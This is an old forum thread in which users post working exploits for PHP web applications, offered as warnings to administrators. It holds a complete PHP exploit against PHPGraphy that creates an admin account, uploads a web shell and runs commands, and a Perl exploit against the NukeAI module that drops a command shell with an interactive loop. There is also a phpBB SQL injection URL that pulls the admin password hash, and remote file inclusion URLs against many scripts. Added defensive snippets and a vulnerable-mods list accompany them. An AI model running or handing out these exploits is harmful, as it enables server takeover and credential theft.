[ Posts: 5 ]
Registered: 13.07.06 Last login: 22.10.07 Posts: 61 Topics: 5 | Posted by wire: 01.12.2006 12:19
Since more and more people are using various content management systems, photo gallery managers and the like, I think it is appropriate to point out that this code has certain bugs.
If you know of any, add information about the bug.
I am attaching a list of the freshest ones; I will gradually add the ones I find, depending on how much time I have.
I remind you that these are not instructions for harming someone, but guidance for people who use the given system, so that they either update to the current version or modify the source so that the bug cannot be exploited.
PHPGraphy 0.9.12 (photo management)
Type: Command Execution Exploit
Code:
<?php
// PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index / privilege escalation /
// remote command execution exploit by rgod
// dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy site"
// mail: retrog@alice.it   site: http://retrogod.altervista.org
// works against register_globals=on

if ($argc < 3) {
    print "Usage: php {$argv[0]} host path cmd OPTIONS\n"
        . "  host: target server (ip/hostname)\n"
        . "  path: path to PHPGraphy\n"
        . "Options:\n"
        . "  -p[port]     specify a port other than 80\n"
        . "  -P[ip:port]  specify a proxy\n"
        . "Example:\n"
        . "  php {$argv[0]} localhost /phpgraphy/ ls -la -P1.1.1.1:80\n"
        . "  php {$argv[0]} localhost / cat ./data/users.dat -p81\n";
    die;
}
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

// hex/ascii dump helper; not called by the main flow, kept from the original
function quick_dump($string) {
    $result = ''; $exa = ''; $cont = 0;
    for ($i = 0; $i < strlen($string); $i++) {
        $o = ord($string[$i]);
        $result .= ($o <= 32 || $o > 126) ? " ." : " " . $string[$i];
        $exa .= " " . str_pad(dechex($o), 2, "0", STR_PAD_LEFT);
        if (++$cont == 15) { $cont = 0; $result .= "\r\n"; $exa .= "\r\n"; }
    }
    return $exa . "\r\n" . $result;
}

$proxy_regex = '/(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b)/';

// send one raw HTTP request, directly or through the proxy, and leave the reply in $html
function sendpacketii($packet) {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port);
        if (!$ock) { echo "No response from $host:$port"; die; }
    } else {
        if (!preg_match($proxy_regex, $proxy)) { echo 'Not a valid proxy...'; die; }
        $parts = explode(':', $proxy);
        echo "Connecting to {$parts[0]}:{$parts[1]} proxy...\r\n";
        $ock = fsockopen($parts[0], $parts[1]);
        if (!$ock) { echo 'No response from proxy...'; die; }
    }
    fputs($ock, $packet);
    $html = '';
    if ($proxy == '') {
        while (!feof($ock)) { $html .= fgets($ock); }
    } else {
        // through a proxy, keep reading at least until the header block has arrived
        while (!feof($ock) || strpos($html, "\r\n\r\n") === false) { $html .= fread($ock, 1); }
    }
    fclose($ock);
}

$host = $argv[1]; $path = $argv[2]; $port = 80; $proxy = ""; $cmd = "";
for ($i = 3; $i < $argc; $i++) {
    $temp = substr($argv[$i], 0, 2);
    if ($temp == "-p")     { $port = substr($argv[$i], 2); }
    elseif ($temp == "-P") { $proxy = substr($argv[$i], 2); }
    else                   { $cmd .= " " . $argv[$i]; }
}
if ($path[0] != '/' || $path[strlen($path) - 1] != '/') { echo 'Error... check the path!'; die; }
$p = ($proxy == '') ? $path : "http://$host:$port$path";

// step 1: reset the admin password. The install_mode=1 cookie re-enables *install mode*
// (register_globals), which lets us create uid 0 with security_level 999 ("god").
// Afterwards you can log in with user -> suntzu, password -> suntzu
$data = "login=suntzu&password=suntzu&security_level=999&uid=0&submit=Submit";
$packet  = "POST {$p}index.php?uid=0 HTTP/1.0\r\n";
$packet .= "Host: $host\r\n";
$packet .= "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet .= "Referer: http://{$host}{$path}index.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: text/plain\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cookie: mode=um; install_mode=1; 2095608056=1; -285023552=1; action=edit;\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(2);

// step 2: log in as the new admin and collect the session cookies
$data = "user=suntzu&pass=suntzu&dir=&rememberme=on&startlogin=1";
$packet  = "POST {$p}index.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://{$host}{$path}index.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
$temp = explode("Set-Cookie: ", $html);
$cookie = "";
for ($i = 1; $i < count($temp); $i++) {
    $temp2 = explode(" ", $temp[$i]);
    $cookie .= " " . $temp2[0];
}
echo "cookie -> $cookie\n";
sleep(1);

// step 3: upload the *evil* shell. The "config" and "dir" cookies escape from the
// .htaccess-protected pictures/ dir, so the upload lands as a *fake* config.php in the
// main folder. You need a writable folder; if it fails try ./themes, ./docs or ./base.
$boundary = "---------------------------7d61bcd1f033e";
$shell = '<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>';
$data  = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"pictures[]\"; filename=\"config.php\"\r\n\r\n";
$data .= "$shell\r\n";
$data .= "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"picupload\"\r\n\r\n";
$data .= "1\r\n";
$data .= "--$boundary--\r\n";
$packet  = "POST {$p}index.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://{$host}{$path}index.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=$boundary\r\n";
$packet .= "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Cookie: config=; -578819025=1; -747504677=1; dir=.; 2087386682=1; 2090185412=1; $cookie\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);

// step 4: launch commands. They travel in the Client-IP request header, which the
// dropped shell reads back as $_SERVER["HTTP_CLIENT_IP"]
$packet  = "GET {$p}config.php HTTP/1.0\r\n";
$packet .= "CLIENT-IP: $cmd\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strpos($html, "my_delim") !== false) {
    $temp = explode("my_delim", $html);
    echo $temp[1];
} else {
    echo "exploit failed...";
}
?>
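The exploit above chains three weaknesses: with register_globals on, a cookie install_mode=1 re-enables the installer so an account with uid=0 and security_level=999 can be created; the picture upload then accepts a file named config.php, and the dir=. cookie moves it out of the .htaccess-protected pictures/ folder; finally, commands arrive in the Client-IP request header, which PHP exposes as $_SERVER["HTTP_CLIENT_IP"]. The Python sketch below is an added example, not code from phpGraphy or from the post, showing how the upload step is closed: the client's filename only supplies a claimed extension, the content must start with the matching image magic bytes, the stored name is chosen by the server, and the destination is confined to an assumed /srv/gallery/pictures root so a dir value cannot walk out of it. The root path, the vet_upload API and the sample inputs are assumptions for illustration.

```python
import os
import secrets

# Magic bytes of the only image types the gallery should accept
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
UPLOAD_ROOT = "/srv/gallery/pictures"   # assumed location; must be served with script execution off


class RejectedUpload(ValueError):
    pass


def safe_stored_name(client_filename, head):
    """Pick the name the file will be stored under, or raise RejectedUpload.

    client_filename is the filename= value of the multipart part; head is the first
    bytes of the uploaded content. The client's name is used only to learn the claimed
    extension and is never written to disk, so "config.php", "x.php\x00.jpg" or a
    name with directory parts cannot influence where or as what the file is stored.
    """
    base = os.path.basename(client_filename.replace("\\", "/"))   # strip any directory part
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise RejectedUpload("extension not allowed: %r" % base)
    if not head.startswith(ALLOWED[ext]):
        raise RejectedUpload("content is not a %s image" % ext)
    return "%s.%s" % (secrets.token_hex(8), ext)


def destination(stored_name, subdir=""):
    """Join the album subdirectory and refuse anything that resolves outside UPLOAD_ROOT."""
    root = os.path.normpath(UPLOAD_ROOT)
    target = os.path.normpath(os.path.join(root, subdir, stored_name))
    # normpath collapses "../"; on a live system also realpath() both sides if symlinks
    # can exist under the root
    if os.path.commonpath([root, target]) != root:
        raise RejectedUpload("destination escapes the upload root: %r" % subdir)
    return target


def vet_upload(client_filename, head, subdir=""):
    """Return (path, None) when the upload may be written, or (None, reason) when rejected."""
    try:
        return destination(safe_stored_name(client_filename, head), subdir), None
    except RejectedUpload as exc:
        return None, str(exc)


if __name__ == "__main__":
    # constructed inputs mirroring the exploit's upload: a PHP file called config.php
    print(vet_upload("config.php", b"<?php passthru($_SERVER['HTTP_CLIENT_IP']);"))
    print(vet_upload("../../config.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF", subdir="."))
    print(vet_upload("photo.png", b"\x89PNG\r\n\x1a\n", subdir="../"))
```

Turning register_globals off, and not reading install_mode or dir from request data at all, removes the first and second steps of the chain; keeping script execution disabled for the upload directory covers the case where a content check is bypassed.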
Posted by topic author wire: 01.12.2006 12:21
PHP-Nuke NukeAI Module 3b (util.php)
Type: Remote File Include Exploit
Code:
#!/usr/bin/perl
# +-------------------------------------------------------------------------------------------
# + nukeai beta3 (util.php) Remote Code Execution Vulnerability
# +-------------------------------------------------------------------------------------------
# + Affected Software .: nukeai beta3
# + Download ..........: http://mesh.dl.sourceforge.net/sourceforge/nukeai/nukeai_beta3.zip
# + Dork ..............: "nukeai beta3"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: DeltahackingTEAM  Code: Dr.Trojan & Dr.Pantagon
# + Exploit: http://[target]/[path]/modules/NukeAI/util.php?AIbasedir=http://
# +-------------------------------------------------------------------------------------------
# + Details:
# + The default nukeai beta3 installation does not prevent any of the files in the
# + modules/NukeAI directory from being accessed by a client. util.php takes the input
# + passed to the script and writes it, unsanitized, to $_POST["filename"].0 in the
# + modules/NukeAI descriptions directory.
# +
# + Vulnerable Code:
# + require_once $AIbasedir."/NukeAI/util.php";
# +-------------------------------------------------------------------------------------------
# Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell]

use strict;
use warnings;
use Getopt::Long;
use URI::Escape;
use IO::Socket;

my ($host, $file, $dir);
my $code = "<?php passthru(\$_GET[cmd]); ?>";

main();

sub usage {
    print "DeltahackingSecurityTEAM\n";
    print "www.deltahacking.net\n";
    print "Dr.Trojan,HIV++,D_7j,Lord,VPc,IMpostor,Dr.Pantagon\n";
    print " http://advistory.deltahacking.net((we Bug))\n";
    print "\nnukeai beta3 Remote Code Execution Exploit\n";
    print "-h, --host\ttarget host\t(example.com)\n";
    print "-f, --file\tshell file\t(shell.php)\n";
    print "-d, --dir\tmodule dir\t(/modules/NukeAI)\n";
    print "============================================================================farzad.sharifi\r\n";
    exit;
}

sub main {
    GetOptions('h|host=s' => \$host, 'f|file=s' => \$file, 'd|dir=s' => \$dir);
    usage() unless $host;

    # path of the NukeAI module on the target. The original appended "NukeAI/util.php" to a
    # default of "/NukeAI", which doubled the directory name; both requests now use $dir directly.
    $dir  = "/modules/NukeAI" unless $dir;
    $file = "shell.php"       unless $file;

    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80")
        or die "\nconnect() failed.\n";
    print "\nconnected to " . $host . ", sending data.\n";

    # util.php writes the POSTed fields into descriptions/<filename>.0 without sanitising them,
    # so the "moreinfo" field becomes the body of a PHP file we can request afterwards
    my $sendurl = "description=0&moreinfo=" . uri_escape($code)
                . "&accesses=0&filename=" . uri_escape($file) . "&date=&B1=Submit";
    print $sock "POST " . $dir . "/util.php?AIbasedir= HTTP/1.1\r\n";
    print $sock "Host: " . $host . "\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Content-Length: " . length($sendurl) . "\r\n\r\n";
    print $sock $sendurl;
    print "attempted to create php shell, server response:\n\n";
    while (my $recvd = <$sock>) { print " " . $recvd; }

    # interactive loop: each command is run through the dropped shell until "~quit"
    my $cmd = "";
    while ($cmd !~ /~quit/) {
        print "\n\n-> ";
        $cmd = <STDIN>;
        last unless defined $cmd;
        chomp $cmd;
        next if $cmd =~ /~quit/;
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80")
            or die "connect() failed.\n";
        print $sock "GET " . $dir . "/descriptions/" . $file . ".0?cmd=" . uri_escape($cmd) . " HTTP/1.1\r\n";
        print $sock "Host: " . $host . "\r\n";
        print $sock "Accept: */*\r\n";
        print $sock "Connection: close\r\n\r\n";
        print "\n";
        while (my $recvd = <$sock>) { print $recvd; }
    }
    exit;
}
Posted by topic author wire: 01.12.2006 12:25
phpBB
Typ: Remote SQL Injection Vulnerability
Code: http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
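The request above works because hack_id is pasted straight into the SQL text, so "-99 UNION SELECT ..." appends a second SELECT whose third column (user_password of user_id 2, the account created at phpBB 2 installation) is rendered where the hack's description would normally appear. The sid=AdminHash part means the attacker already needs a valid admin session id, so the bug is reachable only from an admin or a stolen session. The Python below is an added illustration against an in-memory SQLite database, not phpBB's or the mod's code: the 12-column phpbb_hacks layout, the rows and the md5 hash are constructed, and php_intval mimics the intval() cast phpBB uses to close this class of bug.

```python
import re
import sqlite3

# Constructed sample data (not from any real board): the phpbb_users columns that matter here
# and a hypothetical 12-column hacks table so the page's 12-column UNION lines up.
HACKS_COLUMNS = ["hack_id", "hack_name", "hack_desc", "hack_author", "hack_version",
                 "hack_url", "c7", "c8", "c9", "c10", "c11", "c12"]
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: md5("password")

# The injection string from the page, percent-decoded
PAYLOAD = ("-99 UNION SELECT null,null,user_password,null,null,null,null,null,null,null,null,null"
           " FROM phpbb_users Where user_id=2")


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT)")
    db.executemany("INSERT INTO phpbb_users VALUES (?, ?, ?)",
                   [(-1, "Anonymous", ""), (2, "admin", ADMIN_HASH)])
    db.execute("CREATE TABLE phpbb_hacks (%s)" % ", ".join(HACKS_COLUMNS))
    db.execute("INSERT INTO phpbb_hacks VALUES (1, 'Demo hack', 'a description', 'someone', '1.0', "
               "'http://example.invalid', 0, 0, 0, 0, 0, 0)")
    return db


def load_hack_vulnerable(db, hack_id):
    """The bug: hack_id from the query string is concatenated into the SQL text."""
    sql = "SELECT * FROM phpbb_hacks WHERE hack_id = " + hack_id
    return db.execute(sql).fetchone()


def php_intval(s):
    """PHP intval() applied to a string: the leading integer, or 0 if there is none."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def load_hack_fixed(db, hack_id):
    """The fix: coerce to an integer (phpBB's intval() idiom) and bind it as a parameter."""
    return db.execute("SELECT * FROM phpbb_hacks WHERE hack_id = ?",
                      (php_intval(hack_id),)).fetchone()


if __name__ == "__main__":
    db = build_db()
    # the vulnerable query returns a row whose hack_desc column carries the admin's hash
    print("vulnerable:", load_hack_vulnerable(db, PAYLOAD))
    # the fixed query sees hack_id = -99 and returns nothing
    print("fixed:     ", load_hack_fixed(db, PAYLOAD))
```

The UNION only lines up because the attacker counted the columns of the original SELECT (twelve here), which is why real payloads are often preceded by a series of failed requests with a different number of nulls; those failed requests are the cheap thing to alert on in the admin panel's logs.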
Posted by topic author wire: 01.12.2006 12:27
Fully Modded phpBB
Typ: Multiple File Include Vulnerabilities
Code:
##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)
##############################################################

Source Code:
http://phpbbfm.net/support/index_fm.php
http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################

Vulnerable Code:
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;

In:
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php
###################################################

Exploit:
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################

Discovered By: 020
###################################################

Special Greetings: Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################
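Both file-inclusion posts above (NukeAI's AIbasedir and Fully Modded phpBB's foing_root_path) have the same shape: a request parameter is prepended to a path that ends up in include()/require(), so with allow_url_fopen/allow_url_include on it can point at an attacker's server; the trailing "?" in the advisory URLs turns whatever the script appends to the path into a query string for the attacker's server, so the remote sh3ll.txt is fetched unchanged. The Python scanner below is an added example, not from the advisories or the projects, of how a defender finds such attempts in access logs: it decodes each query parameter, flags remote URLs, PHP stream wrappers and directory traversal, and rates a hit higher when the parameter name looks like an include path. The log lines are constructed, and the name patterns in INCLUDE_PARAM_RE are a heuristic of mine, not a list taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Feb/2007:13:20:01 +0100] "GET /forum/faq.php?foing_root_path=http://evil.example/sh3ll.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.6 - - [03/Feb/2007:13:20:02 +0100] "GET /forum/faq.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
10.0.0.7 - - [03/Feb/2007:13:20:03 +0100] "GET /modules/NukeAI/util.php?AIbasedir=ftp%3A%2F%2Fevil.example%2Fx HTTP/1.1" 200 100 "-" "curl/7.15"
10.0.0.8 - - [03/Feb/2007:13:20:04 +0100] "GET /forum/index.php?foing_root_path=../../../../etc/passwd%00 HTTP/1.1" 200 100 "-" "curl/7.15"
10.0.0.9 - - [03/Feb/2007:13:20:05 +0100] "GET /forum/viewtopic.php?t=12&highlight=http://example.org HTTP/1.1" 200 100 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^\s*(https?|ftps?)://', re.I)                     # remote include
WRAPPER_RE = re.compile(r'^\s*(php|data|expect|phar|zip|glob|compress\.\w+):', re.I)  # PHP stream wrappers
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|\x00')                                # local include / null byte
# parameter names that usually feed include()/require(): a hit here is the serious kind
INCLUDE_PARAM_RE = re.compile(r'path|dir|root|base|inc|file|page|template|conf', re.I)


def classify_value(value):
    """Return the list of reasons a decoded parameter value looks like an inclusion payload."""
    reasons = []
    if REMOTE_RE.search(value):
        reasons.append("remote-url")
    if WRAPPER_RE.search(value):
        reasons.append("php-wrapper")
    if TRAVERSAL_RE.search(value):
        reasons.append("traversal")
    return reasons


def scan_line(line):
    """Return the suspicious parameters of one log line (empty list if clean), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)   # parse_qsl decoded once; this catches double-encoded payloads
        reasons = classify_value(value)
        if reasons:
            hits.append({"ip": m.group("ip"), "path": url.path, "param": name, "value": value,
                         "reasons": reasons,
                         "severity": "high" if INCLUDE_PARAM_RE.search(name) else "low"})
    return hits


def scan_log(text):
    hits = []
    for line in text.splitlines():
        if line.strip():
            hits.extend(scan_line(line) or [])
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["severity"], h["ip"], h["path"], h["param"], h["reasons"])
```

The low-severity hit on highlight=http://... shows the trade-off: URL-valued parameters are common in legitimate traffic, so the parameter name and the response status should be part of triage. Server side the fix is the same for both products: never build an include path from request data, or check the value against an allow-list of known directories; turning off allow_url_include removes the remote variant but not the local traversal one.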
Registered: 01.05.05 Posts: 13348 Topics: 1496 Location: Bratislava | Posted by JanoF: 03.02.2007 13:20
A small list of phpBB modifications through which a forum can be broken into.
Do not install these modifications on your forum; it would become vulnerable.
phpRaid: File Inclusion Vulnerability
pafileDB: File Inclusion Vulnerability
Auction: File Inclusion Vulnerability
Knowledge Base Mod: SQL-Injection
Advanced GuestBook: File Inclusion Vulnerability
TopList: File Inclusion Vulnerability
Backup sql Mod: File Inclusion Vulnerability
Activity MOD Plus: File Inclusion Vulnerability
hacks_list: File Inclusion Vulnerability
Topic Calendar: XSS
LDMan Pro: sql injection
Calendar Pro: sql injection
Datenbank mod: Remote File Vulnerability
Smilies Album 1.1.0: XSS Vulnerability
THoRCMS: Remote File Vulnerability
Blend Portal: Remote File Vulnerability
All Topics Hack: Sql injection
User Class Mod: Sql injection
Most Used Languages Module: Sql injection
mail2forum: File Inclusion Vulnerability
Cracker Tracker Professional: DoS Flooder
Personal Notes: Xss Vulnerability
Cracker Tracker Professional: Xss Vulnerability
Calendar Lite: Xss Vulnerability
All Topics Mod: SQL Injection
PhpBB Album mod: File Inclusion Vulnerability
phpBB Shadow Premod: File Inclusion Vulnerability
Security Suite Mod 1.0.0: File Inclusion Vulnerability
Admin Topic Action Logging Mod: File Inclusion Vulnerability
User Viewed Posts Tracker: File Inclusion Vulnerability
Random User Registration: File Inclusion Vulnerability
Amazonia Mod: File Inclusion Vulnerability
News Defilante Horizontal: File Inclusion Vulnerability
lat2cyr Mod 1.0.1: File Inclusion Vulnerability
SpamOborona Mod: File Inclusion Vulnerability
RPG Events 1.0: File Inclusion Vulnerability
SearchIndexer Mod: File Inclusion Vulnerability
Prillian French Mod: File Inclusion Vulnerability
ACP User Registration Mod 1.0: File Inclusion Vulnerability
Security: File Inclusion Vulnerability
Journals System Mod 1.0.2: File Inclusion Vulnerability
Insert User Mod: File Inclusion Vulnerability
Import Tools Mod: File Inclusion Vulnerability
Ajax Shoutbox: File Inclusion Vulnerability
SpamBlocker Mod: File Inclusion Vulnerability